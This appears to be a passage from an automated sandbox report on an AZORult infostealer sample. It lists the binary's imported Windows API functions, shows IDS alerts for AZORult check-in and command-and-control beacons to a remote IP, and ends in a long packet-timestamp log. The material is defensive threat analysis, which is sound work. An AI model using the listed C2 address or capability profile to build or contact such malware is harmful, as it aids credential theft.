| RT_MANIFEST | 0x13f9b4 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823 |


| DLL | Import |
|---|---|
| WSOCK32.dll | gethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect |
| VERSION.dll | GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW |
| WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW |
| COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create |
| MPR.dll | WNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W |
| WININET.dll | HttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable |
| PSAPI.DLL | GetProcessMemoryInfo |
| IPHLPAPI.DLL | IcmpSendEcho, IcmpCloseHandle, IcmpCreateFile |
| USERENV.dll | DestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile |
| UxTheme.dll | IsThemeActive |
| KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW |
| USER32.dll | GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient |
| GDI32.dll | EndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath |
| COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW |
| ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW |
| SHELL32.dll | DragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW |
| ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket |
| OLEAUT32.dll | CreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture |

                                  Language of compilation system | Country where language is spoken
                                  English | Great Britain
                                  Timestamp | Protocol | SID | Signature | Severity | Source Port | Dest Port | Source IP | Dest IP
                                  2024-08-29T23:42:06.010055+0200 | TCP | 2029467 | ET MALWARE Win32/AZORult V3.3 Client Checkin M14 | 1 | 49730 | 80 | 192.168.2.4 | 172.67.128.117
                                  2024-08-29T23:42:06.010055+0200 | TCP | 2810276 | ETPRO MALWARE AZORult CnC Beacon M1 | 1 | 49730 | 80 | 192.168.2.4 | 172.67.128.117
                                  2024-08-29T23:42:06.268614+0200 | TCP | 2029136 | ET MALWARE AZORult v3.3 Server Response M1 | 1 | 80 | 49730 | 172.67.128.117 | 192.168.2.4
                                  2024-08-29T23:42:14.381818+0200 | TCP | 2029467 | ET MALWARE Win32/AZORult V3.3 Client Checkin M14 | 1 | 49731 | 80 | 192.168.2.4 | 172.67.128.117
                                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                  Aug 29, 2024 23:42:06.781603098 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.783369064 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.783389091 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.783400059 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.783415079 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.783453941 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.783463001 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.783476114 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.783505917 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.783514023 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.783518076 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.783552885 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.783586025 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.783627033 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.783637047 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.783648014 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.783659935 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.783670902 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.783672094 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.783709049 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.783709049 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.783725977 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.783761024 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.784053087 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.784099102 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.784106970 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.784123898 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.784135103 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.784152985 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.784176111 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.784204960 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.784270048 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.784281015 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.784281015 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.784318924 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.784368038 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.784379959 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.784390926 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.784403086 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.784410954 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.784431934 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.784462929 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.784495115 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.784504890 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.784519911 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.784531116 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.784540892 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.784564018 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.784579992 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.784890890 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.784928083 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.784936905 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.784940004 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.784970045 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.784974098 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.784989119 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.784989119 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.785017967 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.785032988 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.785121918 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.785171032 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.785180092 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.785192013 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.785229921 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.785243034 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.785245895 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.785257101 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.785267115 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.785279989 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.785309076 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.785321951 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.785324097 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.785353899 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.785370111 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.785681009 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.785701036 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.785712957 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.785726070 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.785748005 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.785763025 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.785810947 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.785825014 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.785835981 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.785846949 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.785861015 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.785873890 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.785916090 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.785934925 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.785945892 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.785957098 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.785969973 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.785981894 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.785981894 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.785998106 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.786022902 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.786034107 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.786034107 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.786046982 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.786072016 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.786088943 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.786976099 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.786987066 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.786997080 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.787024021 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.787050009 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.787060976 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.787071943 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.787075996 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.787085056 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.787113905 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.787113905 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.787131071 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.787133932 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.787157059 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.787162066 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.787172079 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.787180901 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.787184000 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.787197113 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.787223101 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.787249088 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.787435055 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.787446022 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.787463903 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.787475109 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.787478924 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.787508965 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.787532091 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.867687941 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.867898941 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.867933035 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.867949963 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.867960930 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.867979050 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.867990971 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.867995977 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.868005991 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.868017912 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.868021965 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.868030071 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.868043900 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.868061066 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.868072987 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.868074894 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.868088007 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.868098021 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.868098021 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.868118048 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.868145943 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.868459940 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.868470907 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.868489981 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.868515015 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.868530989 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.868544102 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.868556023 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.868566990 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.868583918 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.868597984 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.868608952 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.868638039 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.868649006 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.868649006 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.868662119 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.868671894 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.868700027 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.868727922 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.868755102 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.868771076 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.868782997 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.868792057 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.868808031 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.868834019 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.868844032 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.868849993 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.868863106 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.868871927 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:06.868895054 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:06.868937969 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.036516905 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.036540985 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.036561966 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.036576033 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.036588907 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.036600113 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.036611080 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.036657095 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.036669970 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.036761999 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.036771059 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.036771059 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.036772966 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.036771059 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.036786079 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.036799908 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.036803961 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.036814928 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.036827087 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.036833048 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.036842108 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.036851883 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.036870956 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.036900997 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.036900997 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.036922932 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.036938906 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.036951065 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.036962032 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.036967039 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.036986113 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.037003040 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.037013054 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.037045956 CEST8049730172.67.128.117192.168.2.4
